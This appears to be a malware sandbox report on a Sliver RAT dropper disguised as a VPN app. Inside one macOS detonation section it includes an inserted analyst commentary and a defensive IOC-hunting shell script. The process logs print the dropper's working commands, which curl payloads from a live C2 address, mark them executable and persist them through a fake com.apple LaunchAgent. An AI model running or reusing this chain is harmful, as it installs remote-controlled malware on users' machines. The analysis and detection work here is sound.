Analysis Overview
SHA256
809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa
Threat Level: Known bad
The file Covid.zip was found to be: Known bad.
Malicious Activity Summary
Sliver RAT v2
Sliver family
Exfiltration Over Alternative Protocol
Launch Agent
Resource Forking
Enumerates physical storage devices
Launchctl
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 18:36
Signatures
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sliver family
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\covid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241101-en
Max time kernel
69s
Max time network
104s
Command Line
Signatures
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/Covid/covid]
/bin/zsh
[/bin/zsh -c /Users/run/Covid/covid]
/Users/run/Covid/covid
[/Users/run/Covid/covid]
/usr/libexec/xpcproxy
[xpcproxy com.apple.WebKit.WebContent.1812A28A-CD94-4C3D-8BD5-FBB8D909FA3F 480]
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
[/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent]
/usr/libexec/xpcproxy
[xpcproxy com.apple.ViewBridgeAuxiliary]
/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary
[/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary]
/usr/libexec/xpcproxy
[xpcproxy com.apple.Safari.SafeBrowsing.Service]
/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service
[/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service]
/usr/libexec/xpcproxy
[xpcproxy com.apple.secinitd]
/usr/libexec/secinitd
[/usr/libexec/secinitd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.audio.systemsoundserverd]
/usr/sbin/systemsoundserverd
[/usr/sbin/systemsoundserverd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.pbs]
/System/Library/CoreServices/pbs
[/System/Library/CoreServices/pbs]
/usr/libexec/xpcproxy
[xpcproxy com.apple.audio.AudioComponentRegistrar]
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
[/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 16-courier.push.apple.com | udp |
| SG | 46.137.201.254:8001 | | tcp |
| US | 8.8.8.8:53 | safebrowsing.googleapis.com | udp |
| GB | 172.217.169.42:443 | safebrowsing.googleapis.com | tcp |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
Files
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db
| MD5 | d3a1859e6ec593505cc882e6def48fc8 |
| SHA1 | f8e6728e3e9de477a75706faa95cead9ce13cb32 |
| SHA256 | 3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c |
| SHA512 | ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db
| MD5 | 0e4a0d1ceb2af6f0f8d0167ce77be2d3 |
| SHA1 | 414ba4c1dc5fc8bf53d550e296fd6f5ad669918c |
| SHA256 | cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030 |
| SHA512 | 1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/malware,osx,url_expression
| MD5 | cb2bf504bb348394c22535f53d84dd54 |
| SHA1 | 73ff1adbf189c97ed6eab0ee36d977e621949250 |
| SHA256 | 8477ac495618b09c50b6abc999c82e5091d8492a4aa93ae7ef38d1b1a0555400 |
| SHA512 | 36d68bdc794ceec2be7740c90add4c3f97bab0b422f9949e006214ffff2a9ab4b6eca2b973f9083627ce0c21da9c5d5c58eb9f0b985b03dcfef406d5b7a9515b |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/social_engineering,osx,url_expression
| MD5 | 2f050ca4ed7d18af575a9cc6df2ade1c |
| SHA1 | d9ad8939146ee1131bd80c45d769a527874d328a |
| SHA256 | 2e3b088f86354c4e39fd6d2bb5975a6c6ebfe80aea8789562f24a6a21165b46a |
| SHA512 | 2d13ddb65439f6243ef7ac214960941c845bd9a4ef5882bd727af6814951f854faf3d00dcc4c1d42063dc012ca03b058dfea3a02c1e69911a6150de76af88f30 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/unwanted_software,osx,url_expression
| MD5 | 5715fc0b6092d43b2aa14608956c9746 |
| SHA1 | 7e7abf3ca08e836e18336f14292460ce6ccebe16 |
| SHA256 | cc974e5143c41e37fce62413a4cee2ef12b3484ef7e926bba7630059f42cb2d2 |
| SHA512 | b9238e3934207a2e24b1b21ac7f9459fe101c67c35564318bd4264b43145458b16eafa568a5f6e2a5d1be095d20fe470324a494f587e423bcf475903a9822aef |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\softwareupdated
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241106-en
Max time kernel
65s
Max time network
148s
Command Line
Signatures
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/Covid/softwareupdated]
/bin/zsh
[/bin/zsh -c /Users/run/Covid/softwareupdated]
/Users/run/Covid/softwareupdated
[/Users/run/Covid/softwareupdated]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21-courier.push.apple.com | udp |
| SG | 46.137.201.254:8888 | | tcp |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| SG | 46.137.201.254:8888 | | tcp |
Files
/var/db/nsurlstoraged/dafsaData.bin
| MD5 | 64f469698e53d0c828b7f90acd306082 |
| SHA1 | bcc041b3849e1b0b4104ffeb46002207eeac54f3 |
| SHA256 | d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd |
| SHA512 | a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\vpn.dmg
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:39
Platform
macos-20241101-en
Max time kernel
80s
Max time network
99s
Command Line
Signatures
Exfiltration Over Alternative Protocol
| Description | Indicator | Process | Target |
| N/A | curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated | N/A | N/A |
| N/A | curl -L http://46.137.201.254/covid -o /Users/run/covid | N/A | N/A |
Launch Agent
Resource Forking
| Description | Indicator | Process | Target |
| N/A | /bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script | N/A | N/A |
Launchctl
| Description | Indicator | Process | Target |
| N/A | launchctl start softwareupdated | N/A | N/A |
| N/A | launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist | N/A | N/A |
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]
/bin/bash
[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]
/usr/bin/sudo
[sudo /bin/zsh -c open /Volumes/vpn/vpn.app]
/bin/zsh
[/bin/zsh -c open /Volumes/vpn/vpn.app]
/usr/bin/open
[open /Volumes/vpn/vpn.app]
/usr/libexec/xpcproxy
[xpcproxy com.apple.softwareupdate.2324]
/Volumes/vpn/vpn.app/Contents/MacOS/vpn
[/Volumes/vpn/vpn.app/Contents/MacOS/vpn]
/bin/bash
[/bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script]
/usr/bin/uname
[uname -m]
/bin/mkdir
[mkdir /Users/run/.androids]
/usr/bin/curl
[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod a+x /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/bin/launchctl
[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/usr/libexec/xpcproxy
[xpcproxy softwareupdated]
/bin/launchctl
[launchctl start softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated]
/usr/bin/chflags
[chflags uchg /Users/run/.androids/softwareupdated]
/usr/bin/curl
[curl -L http://46.137.201.254/covid -o /Users/run/covid]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated -D]
Network
| Country | Destination | Domain | Proto |
| SG | 46.137.201.254:80 | | tcp |
| US | 8.8.8.8:53 | e6858.dscx.akamaiedge.net | udp |
| SG | 46.137.201.254:80 | | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\MacOS\vpn
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241106-en
Max time kernel
77s
Max time network
147s
Command Line
Signatures
Exfiltration Over Alternative Protocol
| Description | Indicator | Process | Target |
| N/A | curl -L http://46.137.201.254/covid -o /Users/run/covid | N/A | N/A |
| N/A | curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated | N/A | N/A |
Launch Agent
Resource Forking
| Description | Indicator | Process | Target |
| N/A | /bin/bash /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
Launchctl
| Description | Indicator | Process | Target |
| N/A | launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist | N/A | N/A |
| N/A | launchctl start softwareupdated | N/A | N/A |
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]
/bin/zsh
[/bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]
/Users/run/vpn.app/Contents/MacOS/vpn
[/Users/run/vpn.app/Contents/MacOS/vpn]
/bin/bash
[/bin/bash /Users/run/vpn.app/Contents/Resources/script]
/usr/bin/uname
[uname -m]
/bin/mkdir
[mkdir /Users/run/.androids]
/usr/bin/curl
[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
/bin/chmod
[chmod a+x /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/bin/launchctl
[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/usr/libexec/xpcproxy
[xpcproxy softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated -D]
/bin/launchctl
[launchctl start softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated]
/usr/bin/chflags
[chflags uchg /Users/run/.androids/softwareupdated]
/usr/bin/curl
[curl -L http://46.137.201.254/covid -o /Users/run/covid]
Network
| Country | Destination | Domain | Proto |
| SG | 46.137.201.254:80 | | tcp |
| US | 8.8.8.8:53 | e6858.dscx.akamaiedge.net | udp |
| SG | 46.137.201.254:80 | | tcp |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
Files
/var/db/nsurlstoraged/dafsaData.bin
| MD5 | 64f469698e53d0c828b7f90acd306082 |
| SHA1 | bcc041b3849e1b0b4104ffeb46002207eeac54f3 |
| SHA256 | d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd |
| SHA512 | a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f |
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
91s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\Resources\script
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241106-en
Max time kernel
114s
Max time network
145s
Command Line
Signatures
Exfiltration Over Alternative Protocol
| Description | Indicator | Process | Target |
| N/A | curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated | N/A | N/A |
| N/A | curl -L http://46.137.201.254/covid -o /Users/run/covid | N/A | N/A |
Launch Agent
Resource Forking
| Description | Indicator | Process | Target |
| N/A | /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
| N/A | sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/Resources/script\"" | N/A | N/A |
| N/A | sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
| N/A | /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
Launchctl
| Description | Indicator | Process | Target |
| N/A | launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist | N/A | N/A |
| N/A | launchctl start softwareupdated | N/A | N/A |
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]
/bin/zsh
[/bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]
/Users/run/vpn.app/Contents/Resources/script
[/Users/run/vpn.app/Contents/Resources/script]
/usr/bin/uname
[uname -m]
/bin/mkdir
[mkdir /Users/run/.androids]
/usr/bin/curl
[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
/bin/chmod
[chmod a+x /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/bin/launchctl
[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/usr/libexec/xpcproxy
[xpcproxy softwareupdated]
/bin/launchctl
[launchctl start softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated -D]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated]
/usr/bin/chflags
[chflags uchg /Users/run/.androids/softwareupdated]
/usr/bin/curl
[curl -L http://46.137.201.254/covid -o /Users/run/covid]
/usr/libexec/xpcproxy
[xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E]
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
[/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService]
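The three macOS detonations of the vpn.app bundle (behavioral6, behavioral8 and behavioral10 above) record the same dropper chain: `uname -m`, `mkdir /Users/run/.androids`, a plain-HTTP `curl` of `softwareupdated2` from 46.137.201.254 into that hidden directory, `chmod a+x`, a per-user LaunchAgent written to `~/Library/LaunchAgents/com.apple.softwareupdate.plist` and loaded then started with `launchctl`, `chflags uchg` on the payload, and a second `curl` for `covid`. The payload then beacons to the same host on 8888 (behavioral4), while `covid` uses 8001 (behavioral2). Both `curl` commands write to a local file (`-o`), so the sandbox's "Exfiltration Over Alternative Protocol" label is better read as a tool download. The Windows detonations only show `cmd.exe` being handed Mach-O files and OpenWith.exe prompting for the `.dmg`, and add nothing to the picture. The shell script below is an added example, not part of the sandbox report or of the sample: it turns the observed footprint into a host hunt. The IOC paths, the `softwareupdated` label and the IP and ports come from the report; the plist body in the fixture is reconstructed from `launchctl start softwareupdated` and the `/Users/run/.androids/softwareupdated -D` process line and is an assumption, as are the function names, the `Downloads` landing directory and the constructed netstat sample.

```shell
#!/bin/sh
# Host hunt for the macOS dropper footprint recorded in behavioral6/8/10.
# Added example, not part of the sandbox report. IOC paths, label and C2 host/ports
# are taken from the report; function names and fixture contents are assumptions.

# Observed payload host and beacon target; 80 = curl downloads, 8001 = covid, 8888 = softwareupdated.
# Pattern matches both macOS netstat ("46.137.201.254.8888") and Linux ("46.137.201.254:8888").
C2_RE='46\.137\.201\.254[.:](80|8001|8888)([^0-9]|$)'
# SHA256 of Covid.zip from the report header
KNOWN_BAD_ZIP_SHA256="809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa"

# sha256 of a file; macOS ships shasum, Linux ships sha256sum
file_sha256() {
  if command -v shasum >/dev/null 2>&1; then shasum -a 256 "$1" | cut -d' ' -f1
  else sha256sum "$1" | cut -d' ' -f1; fi
}

# hunt_home HOME_DIR: print one "FINDING: ..." line per artifact of the chain
hunt_home() {
  hh_home="$1"
  hh_payload="$hh_home/.androids/softwareupdated"
  hh_plist="$hh_home/Library/LaunchAgents/com.apple.softwareupdate.plist"
  hh_stage2="$hh_home/covid"

  if [ -d "$hh_home/.androids" ]; then
    echo "FINDING: hidden staging dir $hh_home/.androids"
  fi
  if [ -f "$hh_payload" ]; then
    echo "FINDING: payload $hh_payload sha256=$(file_sha256 "$hh_payload")"
    # the dropper runs 'chflags uchg' on the payload; only macOS ls understands -O
    if [ "$(uname -s)" = "Darwin" ] && ls -lO "$hh_payload" 2>/dev/null | grep -q uchg; then
      echo "FINDING: uchg (user-immutable) flag on $hh_payload; clear with: chflags nouchg"
    fi
  fi
  # Apple's own agents live in /System/Library/LaunchAgents; a com.apple.* plist in a
  # per-user LaunchAgents directory is masquerading, and this exact path is what the dropper loads
  if [ -f "$hh_plist" ]; then
    echo "FINDING: masquerading LaunchAgent $hh_plist"
    if grep -Eq 'softwareupdated|\.androids' "$hh_plist"; then
      echo "FINDING: $hh_plist references the payload"
    fi
  fi
  if [ -f "$hh_stage2" ]; then
    echo "FINDING: second stage $hh_stage2 sha256=$(file_sha256 "$hh_stage2")"
  fi
  # Look for the initial archive by hash (Downloads as landing directory is an assumption)
  for hh_zip in "$hh_home"/Downloads/*.zip; do
    if [ -f "$hh_zip" ] && [ "$(file_sha256 "$hh_zip")" = "$KNOWN_BAD_ZIP_SHA256" ]; then
      echo "FINDING: $hh_zip matches the Covid.zip SHA256 from the report"
    fi
  done
  return 0
}

# hunt_count HOME_DIR: number of findings (0 when clean); never fails under set -e
hunt_count() { hunt_home "$1" | grep -c '^FINDING' || true; }

# c2_session_count: count netstat-style lines on stdin that talk to the C2 host on its observed ports
c2_session_count() { grep -Ec "$C2_RE" || true; }

# make_fixture DIR: constructed sample reproducing the on-disk footprint in a scratch
# directory (inert placeholder files, no network) so the hunt can be exercised offline.
# The plist body is reconstructed from 'launchctl start softwareupdated' and the
# '/Users/run/.androids/softwareupdated -D' process line; the real file was not captured.
make_fixture() {
  mf_home="$1"
  mkdir -p "$mf_home/.androids" "$mf_home/Library/LaunchAgents"
  printf '#!/bin/sh\nexit 0\n' > "$mf_home/.androids/softwareupdated"
  chmod a+x "$mf_home/.androids/softwareupdated"
  cat > "$mf_home/Library/LaunchAgents/com.apple.softwareupdate.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>softwareupdated</string>
  <key>ProgramArguments</key>
  <array><string>/Users/run/.androids/softwareupdated</string><string>-D</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>
EOF
  chmod 644 "$mf_home/Library/LaunchAgents/com.apple.softwareupdate.plist"
  : > "$mf_home/covid"
}

# Constructed netstat sample: one beacon to the C2 host, one unrelated TLS session
SAMPLE_NETSTAT='tcp4  0  0  192.168.1.20.49233  46.137.201.254.8888  ESTABLISHED
tcp4  0  0  192.168.1.20.49234  17.57.146.20.5223   ESTABLISHED'

# Demo run against the fixture (safe; point hunt_home at /Users/* on a real host instead)
DEMO_HOME="$(mktemp -d)"
make_fixture "$DEMO_HOME"
hunt_home "$DEMO_HOME"
echo "C2 sessions in sample: $(printf '%s\n' "$SAMPLE_NETSTAT" | c2_session_count)"
rm -rf "$DEMO_HOME"
```

On a live Mac, run `for h in /Users/*; do hunt_home "$h"; done` and feed `netstat -an` into `c2_session_count`. When remediating, unload the agent first (`launchctl bootout gui/$(id -u) ~/Library/LaunchAgents/com.apple.softwareupdate.plist`), then `chflags nouchg` the payload before quarantining it, since the immutable flag set by the dropper blocks deletion even as root until it is cleared.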
Network
| Country | Destination | Domain | Proto |
| SG | 46.137.201.254:80 | | tcp |
| US | 8.8.8.8:53 | b._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | db._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | itunes.apple.com | udp |
| GB | 23.74.160.23:443 | itunes.apple.com | tcp |
| SG | 46.137.201.254:80 | | tcp |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cds.apple.com | udp |
| US | 23.192.22.130:443 | cds.apple.com | tcp |
| US | 8.8.8.8:53 | help.apple.com | udp |
| GB | 2.23.221.174:443 | help.apple.com | tcp |
| GB | 2.23.221.174:443 | help.apple.com | tcp |
Files
/var/db/nsurlstoraged/dafsaData.bin
| MD5 | 64f469698e53d0c828b7f90acd306082 |
| SHA1 | bcc041b3849e1b0b4104ffeb46002207eeac54f3 |
| SHA256 | d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd |
| SHA512 | a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f |